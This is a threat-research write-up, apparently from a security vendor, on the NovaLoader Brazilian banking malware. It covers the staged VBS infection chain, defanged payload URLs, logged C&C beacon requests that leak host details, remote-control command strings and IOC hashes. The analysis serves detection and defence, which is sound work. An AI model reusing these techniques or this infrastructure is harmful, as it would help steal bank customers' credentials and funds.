As part of our daily threat tracking activity, ThreatLabZ researchers recently came across an interesting Brazilian banking malware campaign. The malware, NovaLoader, was written in Delphi and made extensive use of Visual Basic Script (VBS) scripting language. Although the final payload was not entirely new and has been discussed by other security researchers, we found that the multi-stage payload delivery was unique.
Delivery method
In earlier documented campaigns, the delivery methods for this malware included spam, social engineering, and fake sites for popular software such as Java. The malware operators use a variety of available options to ensure malware delivery and try to avoid detection by security products. They often do so by abusing popular legitimate services like Dropbox, GitHub, Pastebin, AWS, GitLab, and others, as well as URL shorteners and dynamic DNS services such as No-IP and DynDNS.
NovaLoader is known to use AutoIt, PowerShell, and batch scripts in the infection chain, but this is the first time we have seen it use VBS. In this campaign, it is also using encrypted scripts instead of simply obfuscated ones.
Fig.1: NovaLoader Infection flow
Main Dropper
MD5: 4ef89349a52f9fcf9a139736e236217e
The main dropper is very simple; its only purpose is to decrypt the embedded VB script and run the decrypted script.
Fig. 2: Stage 1 VB script decryption loop
Stage 1 Script
Embedded script before and after decryption:
Fig. 3: VB script before and after decryption
This VBS file will decrypt a URL (dwosgraumellsa[.]club/cabaco2.txt) to download another encrypted script and run that after decryption.
D
Fig. 4: Download request for the next stage, an encrypted payload
Stage 2 Script
Downloaded VB script looks like the following after decryption:
Fig. 5: VBS after decryption
The VB script will send a GET request to “http://54.95.36[.]242/contaw.php” , possibly to let the command-and-control (C&C) server know that it is running on the system. After that it will try to detect presence of virtual environment using Windows Management Instrumentation (WMI) queries, as shown below.
Fig. 6: VM detection code
NovaLoader will drop and copy following executable files into the directory C:\\Users\\Public\\:
C:\\Windows\\(system32|SysWOW64)\\rundll32.exe
C:\\Windows\\(system32|SysWOW64)\\Magnification.dll
Fig. 7: C&C notification request
After that it will download a following files from 32atendimentodwosgraumell[.]club
32atendimentodwosgraumell[.]club/mi5a.php decrypted and saved at C:\Users\Public\{random}4.zip
32atendimentodwosgraumell[.]club/mi5a1.zip saved at C:\Users\Public\{random}1.zip
32atendimentodwosgraumell[.]club/mi5asq.zip saved at C:\Users\Public\{random}sq.zip
Then it will send multiple GET requests to “54.95.36.242/contaw{1-7}[.]php”
Fig. 8: Multiple C&C requests
GET /contaw.php
GET /contaw2.php?w={redacted}BIT-PC_Microsoft%20Windows%207%20Professional%20_True
GET /contaw3.php?w={redacted}BIT-PC
GET /contaw4.php?w={redacted}BIT-PC
GET /contaw5.php?w={redacted}BIT-PC
GET /contaw6.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM
GET /contaw7.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_
It will also drop several files into the C:\Users\Public\ directory:
|
Dropped files |
MD5 |
Comment |
|
DST.exe |
51138BEEA3E2C21EC44D0932C71762A8 |
copied rundll32.exe |
|
I |
3DC26D510907EAAC8FDC853D5F378A83 |
encypted file containing various values like version, extension etc. |
|
I_ |
A34F1D7ED718934185EC96984E232784 |
encrypted configuration file |
|
KC |
89473D02FEB24CE5BDE8F7A559631351 |
similar to file named "I" |
|
mwg.dll |
F3F571288CDE445881102E385BF3471F |
copied magnification.dll |
|
PFPQUN.DST |
8C03B522ACB4DDC7F07AB391E79F1601 |
support dll to decrypt main payload |
|
PFPQUN1.DST |
F3D4520313D05C66CEBA8BDA748C0EA9 |
encrypted main payload |
|
winx86.dll |
87F9E5A6318AC1EC5EE05AA94A919D7A |
Sqlite dll |
Fig. 9: Files dropped by script
And, finally, it will execute the decrypted DLL exported function using the copied rundll32.exe file.
Fig. 10: Executing the stage-3 payload
The stage-3 payload is a DLL file that acts as a loader for the final payload. It is run via rundll32.exe and its purpose is to decrypt and load the final payload.
Final payload
The final payload is written in Delphi. It has multiple capabilities including stealing victim's credentials for several Brazilian banks. It monitors the browser window’s title for bank names and if a targeted tab is found, the malware can take control of the system and block the victim from the real bank's page to do its nefarious activities by communicating to its C&C. Its activity is quite similar to the well-known Overlay RAT.
Some of the interesting commands used by the malware include:
|
Command String |
Description |
|
<|SocketMain|> |
To stabilize socket connection |
|
<|Info|> |
Sends infected OS details |
|
<|PING|> |
Checking status of the connection |
|
<|Close|> |
Close all connections |
|
<|REQUESTKEYBOARD|> |
Sends keystrokes to the active application window |
|
<|MousePos|> |
Set mouse position |
|
<|MouseLD|> |
Set mouse left button down |
|
<|MouseLU|> |
Set mouse left button up |
|
<|MouseRD|> |
Set mouse right button up |
|
<|MouseRU|> |
Set mouse right button down |
|
<|Desktop|> |
Share compromised system desktop |
|
<|gets|> |
Check gets in C&C response to check if data is correct reply with <|okok|> |
Fig. 11: NovaLoader C&C commands
There were many interesting strings related to the Brazilian banks found in malware:
|
Strings in malware |
Corresponding bank site |
|
caixa | |
|
bancodobrasil | |
|
bbcombr | |
|
bradesco | |
|
santander | |
|
bancodaamazonia | |
|
brbbanknet | |
|
banese | |
|
banestes | |
|
bancodoestadodopar | |
|
bancobs2 | |
|
citibankbrasil | |
|
bancofibraonline | |
|
bancoguanabara |
http://www.bancoguanabara.com.br/ |
|
ccbbrasil | |
|
bancoindusval | |
|
internetbankingbancointer | |
|
modalbanking | |
|
bancopan | |
Fig. 12: Some of the targeted bank strings found in the malware
Conclusion
The Brazilian actors are among the top contributors of global cybercrime and they are always coming up with new ways to infect their targets using spam, social engineering, and phishing. In this campaign, we have observed them targeting Brazilian financial institutions using malware written in Delphi. The Zscaler ThreatLabZ team is actively tracking and reviewing all malicious payloads to ensure that our customers are protected.
IOCs
Md5
60e5f9fe1b778b4dc928f9d4067b470b
4ef89349a52f9fcf9a139736e236217e
100ff8b5eeed3fba85a1f64db319ff40
99471d4f03fb5ac5a409a79100cd9349
cb2ef5d8a227442d0156de82de526b30
a16273279d6fe8fa12f37c57345d42f7
ac4152492e9a2c4ed1ff359ee7e990d1
fdace867e070df4bf3bdb1ed0dbdb51c
4d5d1dfb84ef69f7c47c68e730ec1fb7
6bf65db5511b06749711235566a6b438
c5a573d622750973d90af054a09ab8dd
ef5f2fd7b0262a5aecc32e879890fb40
35803b81efc043691094534662e1351c
34340c9045d665b800fcdb8c265eebec
a71e09796fb9f8527afdfdd29c727787
5a9f779b9cb2b091c9c1eff32b1f9754
a7117788259030538601e8020035867e
cb9f95cec3debc96ddc1773f6c681d8c
a7722ea1ca64fcd7b7ae2d7c86f13013
URLs
185[.]141[.]195[.]5/prt1.txt
185[.]141[.]195[.]81/prt3.txt
185[.]141[.]195[.]74/prt1.txt
dwosgraumellsa[.]club/cabaco2.txt
wn5zweb[.]online/works1.txt
23[.]94[.]243[.]101/vdb1.txt
167[.]114[.]31[.]95/gdo1.txt
167[.]114[.]31[.]93/gdo1.txt
